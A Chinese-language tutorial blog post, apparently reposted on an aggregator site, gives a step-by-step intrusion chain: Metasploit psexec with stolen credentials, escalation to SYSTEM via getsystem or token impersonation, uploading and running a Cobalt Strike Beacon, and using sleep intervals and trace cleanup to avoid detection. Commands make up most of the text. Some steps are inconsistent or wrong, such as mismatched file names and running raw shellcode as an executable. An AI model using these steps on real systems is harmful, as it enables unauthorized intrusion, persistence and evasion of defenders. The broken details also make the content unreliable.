当前位置: 首页 > news >正文

黑客技术零基础入门教程—MSF上线到CS工具中可执行的实战方案(非常详细)

文章目录

      • 实际案例背景
      • 步骤详解
        • 1. 获取低权限 Meterpreter 会话
          • 1.1 使用 Metasploit 获取会话
        • 2. 提权到 SYSTEM 权限
          • 2.1 使用 getsystem 自动提权
          • 2.2 如果 getsystem 失败:使用令牌冒充 (incognito 模块)
        • 3. 上线到 Cobalt Strike
          • 3.1 生成 Cobalt Strike Payload (Beacon)
          • 3.2 在目标系统上执行 Beacon Payload
          • 3.3 使用 Meterpreter 转发会话到 Cobalt Strike
        • 4. 验证与稳定控制
        • 5. 整体项目方案总结
          • 前期准备
          • 提权阶段
          • 上线 Cobalt Strike
          • 后续管理
        • 注意事项

  • 描述如何使用 Metasploit(msf)提权目标主机到 SYSTEM 权限,并将提权后的会话迁移到 Cobalt Strike 工具中。

实际案例背景

  • 目标系统:Windows 10(存在已知的权限提升漏洞或可利用的令牌)
  • 初始情况:已通过 Metasploit 成功获取一个低权限的 Meterpreter 会话。
  • 目标
    • 提权到 SYSTEM 权限。
    • 将提权后的会话转移到 Cobalt Strike 中管理和控制。


步骤详解

1. 获取低权限 Meterpreter 会话
1.1 使用 Metasploit 获取会话
  1. 启动 Metasploit 控制台:
msfconsole
  1. 使用一个合适的漏洞模块,例如 SMB 远程代码执行(假设已经有弱口令或凭证):
use exploit/windows/smb/psexec
  1. 设置攻击参数:
set RHOSTS <目标IP> set SMBUser <用户名> set SMBPass <密码> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <本地IP> set LPORT 4444
  1. 执行攻击:
exploit

成功后会得到一个低权限的 Meterpreter 会话,例如:

[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.150:49215)

2. 提权到 SYSTEM 权限
2.1 使用 getsystem 自动提权
  1. 切换到低权限会话:
sessions -i 1
  1. 尝试自动提权:
getsystem

  1. 可能的返回:
[*] Got SYSTEM via technique 1.
  1. 验证提权结果:
getuid

如果返回:

Server username: NT AUTHORITY\SYSTEM

则说明提权成功。


2.2 如果 getsystem 失败:使用令牌冒充 (incognito 模块)
  1. 加载 incognito 扩展:
load incognito
  1. 列出可用令牌:
list_tokens -u

可能看到:

[*] Available tokens: NT AUTHORITY\SYSTEM DOMAIN\Administrator
  1. 冒充 SYSTEM 令牌:
impersonate_token "NT AUTHORITY\\SYSTEM"
  1. 再次验证权限:
getuid

应返回 SYSTEM 权限。


3. 上线到 Cobalt Strike
3.1 生成 Cobalt Strike Payload (Beacon)
  • 在 Cobalt Strike 中生成 Payload(Beacon)。

  • Cobalt Strike Console-> Cobalt Strike 菜单 -> Attacks -> Packages -> Windows Executable (S)。

  • 选择 Payload 类型:windows/beacon_http/reverse_http或其他你配置的类型。

  • 配置监听器、域名、端口等参数。
  • 导出为可执行文件 (EXE) 或 Shellcode (RAW/BIN)。
  • 将 Payload 上传到目标系统。 在 Meterpreter 会话中:
upload /home/hao/12.exe C:\\Windows\\Temp\\12.exe


3.2 在目标系统上执行 Beacon Payload
  • 在 Meterpreter 中,执行上传的 Beacon:
execute -f C:\\Windows\\Temp\\14.exe

  • Cobalt Strike 会自动捕获到 Beacon 会话(如果配置正确的话)。
    • 在 Cobalt Strike 中,导航到View -> Beacons查看上线的会话。
    • 若成功,则会在 Beacon 管理界面看到新上线的会话,权限应为 SYSTEM。


3.3 使用 Meterpreter 转发会话到 Cobalt Strike

如果无法直接执行 Beacon Payload,也可以使用msfvenom生成 Shellcode 并在 Cobalt Strike 中监听。步骤如下:

  • 生成 Raw Shellcode(Cobalt Strike 控制台):
msfvenom -p windows/meterpreter/reverse_http LHOST=<Cobalt Strike 服务器IP> LPORT=80 -f raw > /tmp/cs_shellcode.raw

  • 上传并注入 Shellcode
    • 上传:

upload /tmp/cs_shellcode.raw C:\\Windows\\Temp\\cs_shellcode.raw
  • 注入:
execute -f C:\\Windows\\Temp\\cs_shellcode.raw
  • Cobalt Strike 捕获会话
    • 同样在View -> Beacons中查看。

4. 验证与稳定控制
  1. 验证 SYSTEM 权限
    在 Cobalt Strike 的 Beacon 控制台中执行:
shell whoami

应返回:

NT AUTHORITY\SYSTEM
  1. 保持会话稳定

    • 使用 Cobalt Strike 的Sleep功能,设置通信时间间隔,避免被防火墙检测。
    • 配置 HTTPS 或 DNS 通道,增加隐蔽性。
  2. 清理痕迹

    • 删除上传的 Payload 和临时文件:
rm C:\\Windows\\Temp\\beacon.exe
* 使用 Cobalt Strike 的 **Artifact Kit** 生成更隐蔽的 Payload。

5. 整体项目方案总结
前期准备
  • 确保 Metasploit 和 Cobalt Strike 配置正确。
  • 确保目标环境合法授权,并已获取初始的 Meterpreter 低权限会话。
提权阶段
  • 优先尝试getsystem提权,失败则用 incognito 进行令牌冒充。
  • 确保成功获得 SYSTEM 权限。
上线 Cobalt Strike
  • 生成 Beacon Payload 并通过 Meterpreter 执行上线。
  • 确保会话成功捕获,并能稳定通信。
后续管理
  • 使用 Cobalt Strike 的功能进行进一步横向移动、信息收集与持久化。
  • 合理使用 Sleep 和加密通信,避免被检测。

注意事项
  • 合法授权:所有步骤必须在目标系统所有者明确授权下进行。
  • 权限验证:每一步都要及时验证当前权限,避免操作失败。
  • 安全清理:完成后,及时清理所有上传的工具和脚本,避免留下痕迹。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取


http://www.jsqmd.com/news/130458/

相关文章:

  • 实邦电子能成为电子产品开发的优质推荐供应商吗?
  • RPA重塑医疗运营!从行政负担到智能自动化,破解医疗行业效率与合规双重困境
  • JavaScript ——JavaScript 加密和安全相关工具函数详解
  • Day 48 Grad-CAM 和 Hook 函数
  • 把win2003-11系统装进了NAS!
  • 2026企业微信高效办公指南:打卡/审批/会议实操
  • 构建品牌社区堡垒:Reddit子版块从规划、启动到增长的全体系指南
  • Python pandas dataframe
  • 大模型救星:RAG技术详解,告别“一本正经胡说八道“,AI开发者的进阶必修课!
  • 新式“Excel”一出,VBA都落伍了,不少网友都在偷偷用,真香!
  • 2025论文写作必备6大神器:一键综述+真实文献交叉引用! - 麟书学长
  • 美团二面:Redis 的 Key 过期时间到了,内存是立马释放的吗?为什么我的主库内存正常,从库却爆了?
  • 20251223给飞凌OK3588-C开发板适配Rockchip原厂的Buildroot【linux-6.1】系统时使用weston-screenshooter截屏【修改直接编译进IMG固件】
  • 高危区域安防新范式!RFID+自主无人机集成监控系统的设计、迭代与实践
  • 基于深度学习的安检危险品检测系统演示与介绍(YOLOv12/v11/v8/v5模型+Pyqt5界面+训练代码+数据集)
  • 看见“黑箱”内部:可解释AI如何赢得工艺专家的信任?
  • SGMICRO圣邦微 SGM2036S-ADJXN5G/TR SOT-23-5 线性稳压器(LDO)
  • 远程调试不用愁!内网服务器也能轻松断点调试的实用技巧
  • 用了电脑9年,才知道的5个免费软件!每个都很牛,同事看完都猛夸
  • Oversonic与意法半导体签署人形机器人供应协议!RoBee认知机器人首入半导体制造,开启高端智造新纪元
  • 特种控制电缆生产厂家推荐:计算机、太阳能光伏、绝缘电力、屏蔽电缆全品类覆盖(2025年12月新) - 品牌2026
  • 双 Token 机制下的无感刷新(Refresh Token)后端实现
  • CTF如何选择一个适合自己的方向?
  • 【学前教育专业论文写作模版】乡村振兴背景下农村幼儿园劳动教育实施策略:基于现状调研的问题分析与路径优化研究
  • 基于51单片机的智能晾衣架设计
  • 生成式AI落地潮:从技术狂欢到商业价值重构
  • 2025年柔性防火电缆生产厂家推荐、低烟无卤电缆生产厂家推荐汇总(12月新) - 品牌2026
  • TOSHIBA TA75S558F,LF(T SOT-153 运算放大器
  • 华为云国际站代理商NAT网关的私网NAT网关的规格有哪些?
  • 直播预告 | 新一代 DBaaS 平台揭密:自研 SSS Workload 引擎与安全体系深度解析